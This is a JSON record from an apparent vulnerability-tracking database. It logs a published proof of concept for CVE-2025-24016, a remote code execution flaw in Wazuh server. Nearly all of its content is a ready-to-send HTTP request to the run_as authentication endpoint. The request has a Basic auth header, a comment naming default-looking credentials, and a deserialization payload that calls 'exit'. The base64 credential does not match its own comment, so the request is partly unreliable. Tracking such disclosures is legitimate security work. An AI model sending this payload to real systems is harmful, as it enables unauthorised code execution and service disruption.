{"uuid": "6a459d18-1c40-49c8-a1c9-cc37df69d977", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2025-24016", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/2528", "content": "CVE-2025-24016\n*\nRCE in Wazuh server\nwazuh-manager version >= 4.4.0\nPatched in version >= 4.9.1\n\nPOST /security/user/authenticate/run_as HTTP/1.1\nHost: target.com:55000\nCache-Control: max-age=0\nAccept-Language: en-US\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36\nAccept: application/json\nAccept-Encoding: gzip, deflate, br\nConnection: keep-alive\nAuthorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg==  # Base64-encoded \"wazuh-wui:MyS3cr37P450r.*-\"\nContent-Type: application/json\nContent-Length: 83\n\n{\n  \"__unhandled_exc__\": {\n    \"__class__\": \"exit\",\n    \"__args__\": []\n  }\n}", "creation_timestamp": "2025-02-22T22:51:12.000000Z"}